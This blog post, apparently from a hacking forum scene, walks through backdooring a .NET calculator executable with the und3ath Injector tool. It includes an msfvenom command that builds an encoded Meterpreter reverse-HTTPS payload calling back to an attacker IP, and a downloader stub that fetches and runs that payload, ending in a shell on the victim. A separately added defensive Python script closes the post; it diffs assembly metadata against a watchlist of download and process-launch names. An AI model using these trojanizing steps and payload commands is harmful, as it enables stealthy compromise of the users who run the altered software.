
Injecting arbitrary code into .NET Assemblies using und3ath Injector


Posted on by infodox

Last night I was browsing a forum I frequent, http://trojanforge.com/, and came across a piece of code named und3ath Injector, written by a user named und3ath. It claimed to be capable of injecting arbitrary code into .NET assemblies without harming the original code: in short, a stealth backdooring tool for .NET executables. The author's article and release can be found on his blog here: http://und3ath.blogspot.fr/2012/10/source-d3ath-jector-mono-cecil-injector.html (this guy is a very good .NET programmer, I expect he will come out with more awesome things soon).

This, to me, was fascinating. What it does is directly inject evil code into the .NET executable, into one of the functions or forms that comprise the assembly, without altering the functionality of the original. It simply sneakily adds a Little Extra. The fact I fucking hate .NET with a passion meant I saw a hilarious extra Evil side to this! A trojanizer for .NET executables? AWESOME. I had trouble in the past injecting MSF payloads into .NET binaries without breaking the original binary.

The proof of concept tool und3ath Injector has two payloads: a Messagebox payload and a Trojan Downloader payload. The first is proof the damn thing works, the second a more weaponized payload for dropping malware or backdoors on a victim system. One of the benefits of using a downloader instead of hiding a full backdoor in there is stealth: fewer modifications to the file, and less for an AV to sign on.

So, without further ado, I am going to inject a dropper into a .NET binary, and see does it function as planned. The dropper will download a Meterpreter payload from a remote server, execute the payload, and we will take it from there.

Before we do anything, we will generate our Metasploit Payload to run on the victim system and place in our webroot. The following should do the trick:

    msfvenom -p windows/meterpreter/reverse_https -f exe -e x86/shikata_ga_nai -i 25 LHOST=192.168.1.41 LPORT=443 > evil.exe

This creates the executable file evil.exe in our current working directory. The msfvenom command should be self-explanatory, but if there is demand for it I will write an article later on using msfvenom. If you are capable of reading the f*cking manual you should get it.

[Figure: Creating the Meterpreter payload]

So we have our evil binary in /var/www/lulz ready to go. We can now move on to the main part of this article: backdooring .NET assemblies by patching them with extra .NET code. The victim .NET binary I chose to use is a simple calculator application. I found it online and decided it made a good enough victim for demonstration purposes. Here is a screenshot of it running, for those of you who do not know what a calculator is.

[Figure: .NET calculator]

Now we open und3ath Injector and select Load File. Use this dialogue to select the binary you wish to backdoor.

[Figure: Selecting a file to backdoor]

Next we click on any of the parts that we think would be good to inject code into (I normally choose the main class for some odd reason, though you could select an on click event). When we click on this the Payloader menu comes up. We insert our information/selection here.

[Figure: Create the Payload]

When you click inject, it starts creating a new binary for you to use and you save it.

[Figure: Saving the Backdoor]

Now we have our evil binary ready to deploy, and have our Metasploit listener ready. We run the modified binary on the victim host and haz shell.

[Figure: Got a shell =D]

So, as you can see, it is relatively trivial to inject arbitrary code into a .NET assembly without affecting the existing functionality of the software.
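From the defender's side, a patched copy still differs from the vendor's build in its metadata: a downloader stub has to import download and process-launch members and carry a URL literal. The following is an added example, not code from the original post or from und3ath Injector; it diffs a suspect copy against a known-good baseline, and the watchlist names and sample bytes are assumptions constructed for illustration.

```python
import re

# Assumed watchlist of framework names a download-and-run stub has to import.
# Illustrative only; not taken from the und3ath Injector source.
WATCHLIST = {"WebClient", "DownloadFile", "DownloadData", "Process", "Start"}

# #Strings heap entries (type/member names) are NUL-terminated UTF-8.
NAME = re.compile(rb"[A-Za-z_][\w.`]{2,}(?=\x00)")
# #US heap literals are UTF-16LE, which is where a hard-coded URL lands.
URL16 = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def metadata_names(data):
    """Identifier-like NUL-terminated strings found in the raw file bytes."""
    return {m.decode("ascii") for m in NAME.findall(data)}


def utf16_urls(data):
    """http(s) URLs stored as UTF-16LE string literals."""
    return {m.decode("utf-16-le") for m in URL16.findall(data)}


def diff_against_baseline(baseline, suspect):
    """Report what the suspect copy contains that the known-good copy lacks."""
    new_names = metadata_names(suspect) - metadata_names(baseline)
    return {
        "new_names": sorted(new_names),
        "watchlist_hits": sorted(new_names & WATCHLIST),
        "new_urls": sorted(utf16_urls(suspect) - utf16_urls(baseline)),
    }


# Constructed sample bytes standing in for the two files (not real assemblies).
BASELINE = b"\x00".join(
    [b"Calculator", b"Form1", b"button1_Click", b"System.Windows.Forms"]) + b"\x00"
PATCHED = (BASELINE + b"WebClient\x00DownloadFile\x00Process\x00Start\x00"
           + "http://example.invalid/payload.bin".encode("utf-16-le") + b"\x00\x00")

if __name__ == "__main__":
    for key, values in diff_against_baseline(BASELINE, PATCHED).items():
        print(key, values)
```

For real files, pass the bytes of the vendor's original and the deployed copy read in binary mode. This is a triage heuristic; a hash or signature check against the vendor's build remains the authoritative test.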
